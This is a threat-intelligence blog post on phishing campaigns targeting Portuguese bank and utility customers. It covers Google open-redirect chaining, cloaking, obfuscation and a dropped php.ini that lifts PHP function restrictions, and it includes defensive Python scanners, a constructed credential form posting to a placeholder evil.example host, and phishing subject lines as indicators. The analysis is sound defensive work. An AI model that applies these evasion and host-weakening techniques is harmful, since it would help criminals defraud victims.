A new month, a new wave of phishing. Learn about the email templates recently used by crooks in Portugal and the new trick they use to bypass detection.

Phishing has been a major challenge for the past two decades, and it is hard to stop because the final decision is almost always left to the user. Email remains the main channel for spreading malicious campaigns, but SMS phishing (smishing) has been widely adopted by criminals as well, since nearly everyone now carries a smart device that malicious content can reach at any time.

In Portugal, part of the phishing and malware campaigns are submitted to and classified by 0xSI_f33d, a feed that compiles malicious threats targeting Portuguese citizens. Based on this data, a Threat Report is released each quarter, allowing us to analyze the most affected sectors, the number of phishing and malware samples by category, and so on. See the Threat Report Portugal – Q2 2021 in the references below.

 

The most popular email templates used by criminals in Portugal

With the start of a new month, users should be aware of the latest and most popular phishing templates released by criminals to lure victims. Below are the templates that impersonate several organizations in Portugal; they typically demand payment of an overdue invoice, a fine, or something in that context.

 

Google open redirects as a trigger to avoid detection

If you think the modus operandi of phishing in Portugal is stuck in the past, you are wrong. Some of the campaigns presented above use a chain of redirects through legitimate Google services so that the malicious URL is not the one first seen by network monitoring systems, firewalls, SIEMs, URL reputation checks, and even endpoint protection such as antivirus and EDR: the link in the email points at a google.com address, and only the browser that follows it ends up on the phishing domain.

By clicking the URL in the body of the malicious email, the victim is sent to a redirect mechanism deployed on a compromised website, which in turn forwards them to the final landing page on another domain.

This behavior has been observed in recent months, both for the distribution of phishing campaigns and of malware. Notably, to make the redirect mechanism less noisy, criminals abuse open-redirect flaws in legitimate Google services: endpoints that accept a destination URL as a parameter and send the browser there without validating it. These hops can be nested several times before the malicious URL is reached.

 

With this chain in operation, the approach proves effective against threat monitoring systems, because what they see is legitimate Google services being used to hop from one portal to the next until the target domain under the criminals' control is reached. In some cases a redirector on a compromised website is also used as a hop on the way to the final URL.
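The Google hops in such a chain can be unwrapped without touching the network, because the destination is carried in the URL itself. The following is an added example written for this post, not code from the original article or from any campaign: it peels nested redirector URLs parameter by parameter and flags the case where a trusted entry host ends on an untrusted one. The google.com/url?q= form is the well-known redirector; the other parameter names, the google.pt entry and the evil.example destination are assumptions and constructed sample data.

```python
"""Offline unwrapping of nested Google-style redirector URLs.

Added example, not code from the original post. Nothing is fetched: the
destination is recovered from the URL parameters alone, which is exactly what
the open-redirect endpoints do server-side before issuing the 30x.
"""
from urllib.parse import urlparse, parse_qs, quote

# Host suffixes treated as trusted redirectors and the query parameters that
# carry the destination. google.com/url?q= is the well-known form; the other
# parameter names are assumptions kept here only to show how to extend it.
REDIRECTOR_PARAMS = {
    "google.com": ("q", "url", "continue"),
    "google.pt": ("q", "url", "continue"),
}


def _is_trusted_host(host: str) -> bool:
    return any(host == s or host.endswith("." + s) for s in REDIRECTOR_PARAMS)


def _redirect_target(url: str):
    """Return the URL a redirector hop points at, or None if this is not a hop."""
    parts = urlparse(url)
    host = parts.netloc.lower()
    for suffix, names in REDIRECTOR_PARAMS.items():
        if host != suffix and not host.endswith("." + suffix):
            continue
        query = parse_qs(parts.query)  # parse_qs percent-decodes one layer
        for name in names:
            for value in query.get(name, []):
                if urlparse(value).scheme in ("http", "https"):
                    return value
    return None


def unwrap_chain(url: str, max_hops: int = 10) -> list:
    """List of URLs from the link in the email down to the final destination."""
    hops = [url]
    while len(hops) <= max_hops:
        nxt = _redirect_target(hops[-1])
        if nxt is None or nxt in hops:  # no further hop, or a loop
            break
        hops.append(nxt)
    return hops


def looks_like_open_redirect_abuse(url: str) -> bool:
    """True when a trusted redirector ultimately lands on an untrusted host."""
    hops = unwrap_chain(url)
    if len(hops) < 2:
        return False
    entry = urlparse(hops[0]).netloc.lower()
    final = urlparse(hops[-1]).netloc.lower()
    return _is_trusted_host(entry) and not _is_trusted_host(final)


# Constructed sample: two nested google.com/url hops in front of a phishing
# page on a placeholder domain (evil.example is a reserved test name).
FINAL = "https://evil.example/edp/fatura.php?id=1141221"
MIDDLE = "https://www.google.com/url?q=" + quote(FINAL, safe="")
SAMPLE_URL = "https://www.google.com/url?q=" + quote(MIDDLE, safe="")

if __name__ == "__main__":
    for i, hop in enumerate(unwrap_chain(SAMPLE_URL)):
        print(f"hop {i}: {hop}")
    print("open-redirect abuse:", looks_like_open_redirect_abuse(SAMPLE_URL))
```

The hop through the compromised website cannot be resolved this way, since it is an HTTP 30x issued by the server; for that step fetch the URL with redirects disabled, from a vantage point the kit does not block, and feed the Location header back into unwrap_chain().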

The systems hosting the redirector are generally legitimate websites that criminals compromise for this purpose, for example by exploiting a known vulnerability in a website component (a CMS plugin or theme, say) or by credential-stuffing attacks against the administration panel, gaining access to the site and, from there, a remote code execution condition.

Once in, it is common to find php.ini files dropped by the criminals, used to push new configuration to the PHP interpreter for that directory. With this, criminals can, for example, re-enable code execution through shell_exec() calls and switch off the host's security restrictions. A typical dropped file looks like this:

safe_mode = Off
disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF
exec = ON 
shell_exec = ON

Not all of these lines do what their author apparently intends. safe_mode and safe_mode_gid were removed in PHP 5.4 and are ignored by any modern interpreter, and exec = ON and shell_exec = ON are not PHP directives at all (exec() and shell_exec() are functions, available simply by not listing them in disable_functions). The two lines that matter are disable_functions = NONE, which effectively lifts whatever function blacklist the hosting provider configured, and open_basedir = OFF, which removes the filesystem confinement. Whether a dropped php.ini is honored at all depends on the SAPI: hosts that run PHP as CGI/FastCGI and look for a php.ini in the script's directory are the ones affected, so finding such a file in an uploads or cache directory is a strong sign of compromise.
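A practical response to this technique is to hunt for dropped INI files under the web root and audit the directives they set. The following scanner is an added example written for this post, not the article's or any hosting panel's code; the sample web root it builds (a provider php.ini plus a dropped one under wp-content/uploads/cache) is constructed data, and the list of file names and directives it knows about is an assumption, extend it to match your hosts.

```python
"""Find dropped php.ini / .user.ini files under a web root that relax PHP's
security directives. Added example (not the post's or any kit's code); the
directive checks reflect what the file shown above tries to do.
"""
import os
import tempfile

INI_NAMES = {"php.ini", "php5.ini", ".user.ini"}
# Directives that did something once or never did; their presence in a dropped
# file is a tell even though a current PHP ignores them.
REMOVED_DIRECTIVES = {"safe_mode", "safe_mode_gid"}            # removed in PHP 5.4
NOT_DIRECTIVES = {"exec", "shell_exec", "system", "passthru"}  # functions, not INI keys
OFF_VALUES = {"", "0", "off", "none", "false", "no"}


def _strip_comment(line: str) -> str:
    """Cut at the first ';' that is not inside a quoted value."""
    quote = None
    for i, ch in enumerate(line):
        if quote:
            if ch == quote:
                quote = None
        elif ch in "\"'":
            quote = ch
        elif ch == ";":
            return line[:i]
    return line


def parse_php_ini(text: str) -> dict:
    """Minimal php.ini parser: key = value, ';' comments, [sections] skipped."""
    out = {}
    for raw in text.splitlines():
        line = _strip_comment(raw).strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = (s.strip() for s in line.split("=", 1))
        out[key.lower()] = value.strip("\"'").lower()
    return out


def audit_ini(directives: dict) -> list:
    """(directive, value, reason) for every setting that weakens the host."""
    findings = []
    for key, value in directives.items():
        if key == "disable_functions" and value in OFF_VALUES:
            findings.append((key, value, "no functions disabled: exec()/shell_exec() usable"))
        elif key == "open_basedir" and value in OFF_VALUES:
            findings.append((key, value, "filesystem confinement removed"))
        elif key in REMOVED_DIRECTIVES:
            findings.append((key, value, "removed in PHP 5.4, ignored; typical of dropped files"))
        elif key in NOT_DIRECTIVES:
            findings.append((key, value, "not a PHP directive; typical of dropped files"))
    return findings


def scan_webroot(root: str) -> list:
    """Walk root and return one dict per suspicious directive found."""
    results = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name not in INI_NAMES:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                directives = parse_php_ini(fh.read())
            for key, value, reason in audit_ini(directives):
                results.append({"path": path, "directive": key, "value": value, "reason": reason})
    return results


# Constructed sample web root: the provider's own php.ini plus the dropped one.
DROPPED_INI = "safe_mode = Off\ndisable_functions = NONE\nsafe_mode_gid = OFF\n" \
              "open_basedir = OFF\nexec = ON\nshell_exec = ON\n"
PROVIDER_INI = "; hosting provider defaults\n" \
               "disable_functions = exec,shell_exec,system,passthru,proc_open\n" \
               'open_basedir = "/home/site/public_html:/tmp"\n'


def build_sample_webroot() -> tuple:
    """Create the sample tree; returns (root, path of the dropped php.ini)."""
    root = tempfile.mkdtemp(prefix="webroot-")
    provider = os.path.join(root, "public_html")
    dropped_dir = os.path.join(provider, "wp-content", "uploads", "cache")
    os.makedirs(dropped_dir)
    with open(os.path.join(provider, "php.ini"), "w") as fh:
        fh.write(PROVIDER_INI)
    dropped = os.path.join(dropped_dir, "php.ini")
    with open(dropped, "w") as fh:
        fh.write(DROPPED_INI)
    return root, dropped


if __name__ == "__main__":
    root, _ = build_sample_webroot()
    for hit in scan_webroot(root):
        print(f"{hit['path']}: {hit['directive']} = {hit['value']}  ({hit['reason']})")
```

Run it against the real document root on a suspected host (as a user with read access to every site directory); the provider's own php.ini produces no findings, while the dropped one lights up every line.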

 

When the victim's request arrives, the kit first checks whether the source IP address is on a blacklist maintained by the criminals, and then whether the User-Agent header matches the browsers the kit is willing to serve. Requests that fail either check are not served the phishing form, which is why automated URL scanners and analysts browsing from a datacenter address often see nothing malicious at all. Below is part of the blacklist used by criminals in Portugal.
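To see why a scanner and a victim get different answers from the same URL, it helps to model the gate. The block below is an added reconstruction of the behaviour described above, written for this post; it is not the kit's code, and every network range, User-Agent token and sample visitor in it is a constructed placeholder (RFC 5737/3849 documentation ranges stand in for the real blacklist).

```python
"""Model of the gate a phishing kit puts in front of its landing page: IP
blacklist first, then User-Agent filtering. Added reconstruction of the
behaviour described in the post, not the kit's own code; all ranges and
tokens are constructed placeholders.
"""
import ipaddress
import re

# Constructed blacklist: documentation ranges standing in for the scanner,
# cloud and vendor ranges a real kit lists.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "203.0.113.0/24",   # e.g. a URL-scanning service
    "198.51.100.0/24",  # e.g. a cloud provider's egress
    "2001:db8::/32",
)]
# Substrings that mark crawlers and analysis tooling.
BLOCKED_UA_TOKENS = ("bot", "crawl", "spider", "curl", "wget", "python-requests",
                     "go-http-client", "virustotal", "urlscan", "headless")
# Only ordinary desktop/mobile browsers get the real page.
TARGET_UA = re.compile(r"iphone|android|windows nt|macintosh|linux x86_64", re.I)


def classify_visitor(ip: str, user_agent: str) -> tuple:
    """Return ('phish', '') for a victim, or ('decoy', reason) for everyone else."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return ("decoy", "bad_ip")
    if any(addr in net for net in BLOCKED_NETWORKS):
        return ("decoy", "ip_blacklist")
    ua = user_agent.lower()
    if any(tok in ua for tok in BLOCKED_UA_TOKENS):
        return ("decoy", "ua_blacklist")
    if not TARGET_UA.search(ua):
        return ("decoy", "ua_not_targeted")
    return ("phish", "")


# Constructed visitors, as an analyst would see them in the kit's access log.
SAMPLE_VISITORS = [
    ("203.0.113.7", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/91.0"),
    ("192.0.2.10", "curl/7.76.1"),
    ("192.0.2.10", "Mozilla/5.0 (compatible; Googlebot/2.1)"),
    ("192.0.2.10", "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) Safari/604.1"),
]


def triage(visitors=SAMPLE_VISITORS) -> list:
    """(ip, verdict, reason) for each visitor, in order."""
    return [(ip, *classify_visitor(ip, ua)) for ip, ua in visitors]


if __name__ == "__main__":
    for ip, verdict, reason in triage():
        print(f"{ip:<14} {verdict:<6} {reason}")
```

The practical consequence: a 404 or blank page from a sandbox or a curl run is not evidence that the campaign is down. Re-check a reported URL from a residential or mobile egress with a real browser User-Agent before closing the ticket.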

 

Obfuscation to avoid detection

To extend the lifetime of the threat, the landing page's HTML is not served in the clear: it is encoded, either as an escaped string that a small JavaScript stub decodes and writes into the document at load time, or with another encoder such as base64 (often both, nested). After decoding, the well-formatted HTML can be read and understood.
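The decoding can be done statically, without executing the page's JavaScript. The following is an added example written for this post, not the article's code or any kit's: it peels the two wrappers mentioned above, a percent-encoded string passed to unescape() and a base64 string passed to atob(), as many times as they are nested, and then pulls out where the form posts the credentials. The sample page it decodes is constructed in the block from a plaintext form (with a placeholder evil.example domain) so the result can be checked against the original.

```python
"""Static unwrapping of the JavaScript/base64 wrapping used on landing pages.

Added example, not the post's code. It peels the two wrappers the post
mentions, a percent-encoded string handed to unescape() and a base64 string
handed to atob(), as many times as they are nested, without running any JS.
"""
import base64
import re
from urllib.parse import quote, unquote

UNESCAPE_RE = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.S)
ATOB_RE = re.compile(r"""atob\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)""", re.S)


def decode_layer(src: str):
    """Decode one wrapper; None when no known wrapper is present."""
    m = UNESCAPE_RE.search(src)
    if m:
        return unquote(m.group(2))
    m = ATOB_RE.search(src)
    if m:
        raw = re.sub(r"\s+", "", m.group(2))
        return base64.b64decode(raw).decode("utf-8", errors="replace")
    return None


def deobfuscate(src: str, max_layers: int = 8) -> str:
    """Peel wrappers until plain HTML (or the layer cap) is reached."""
    current = src
    for _ in range(max_layers):
        nxt = decode_layer(current)
        if nxt is None:
            break
        current = nxt
    return current


def extract_form_actions(html: str) -> list:
    """Where the credentials go: the form action URLs in the decoded page."""
    return re.findall(r"""<form[^>]*\baction=["']([^"']+)["']""", html, re.I)


# Constructed sample: a plain credential form wrapped twice the way kits do
# (unescape() inside, base64/atob() outside). evil.example is a placeholder.
PLAIN_HTML = (
    '<html><body><form action="https://evil.example/post.php" method="post">'
    '<input name="user"><input name="pass" type="password"></form></body></html>'
)


def build_sample() -> str:
    inner = "document.write(unescape('%s'));" % quote(PLAIN_HTML, safe="")
    outer = base64.b64encode(inner.encode()).decode()
    return "<script>eval(atob('%s'))</script>" % outer


if __name__ == "__main__":
    decoded = deobfuscate(build_sample())
    print(decoded)
    print("credentials posted to:", extract_form_actions(decoded))
```

Kits that use a custom decoder (string reversal, XOR with a key, charCode arrays) will stop this at the first unknown layer; at that point add a matching decode_layer() branch or fall back to running the stub in an instrumented browser.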

 

But … Is Phishing still a problem?

The short answer is yes. Phishing is a growing problem for businesses every day, and it requires stronger defenses, not just more careful users.

Educating employees, and people in general, is always the right way to raise awareness of this threat. Training around password hygiene, common phishing techniques (spotting spoofed senders and suspicious messages), and the consequences of phishing scams conveys the importance of email security. But this is not only a user problem: organizations need to put in place mechanisms that detect and block unwanted or untrusted accesses early.

In that sense, keeping an eye on the systems and creating honeypot accounts to interact with the criminals, so that everything they touch can be traced back to the people behind the campaign, are some of the ideas that can effectively help track this threat and minimize its impact.

 

Take home message

Be proactive and start taking phishing protection seriously!

 

 

Indicators of Compromise (IoCs): email subject lines, kept verbatim

Comunicado Cliente EDP Energia Portugal - FATURA EM ATRASO 1141221/2021
CREDITO AGRICOLA ALERTA - Servico Bloqueado Ative Agora MULTA EUR 147,30. - 
GALP ENERGIA - ATENCAO. TEM 563,72 EUR EM DIVIDA.
Seu aplicativo mudou. Será necessário activar novamente seu registo.
EDP PORTUGAL - Sua fatura EDP expirou, Aviso de Desligamento.
EuroBicNet - Sistema Online de Notificacoes Codigo Utilizador Bloqueado. 
NOVOBANCO INFORMA - Registe seu Dispositivo como seguro, evite cancelamento e multa. 
Millennium bcp: Utilizador desactivado - Telemovel NAO registado, ative agora seu telemovel.

 

References

Threat Report Portugal – Q2 2021
Cuidado com as fraudes bancárias dos últimos dias: Detetar e proteger-se (Beware of the banking frauds of the last few days: detect and protect yourself)
Phishing bancário em andamento e tirando partido de falhas open-redirect do Google para evitar deteção (Banking phishing in progress, taking advantage of Google open-redirect flaws to evade detection)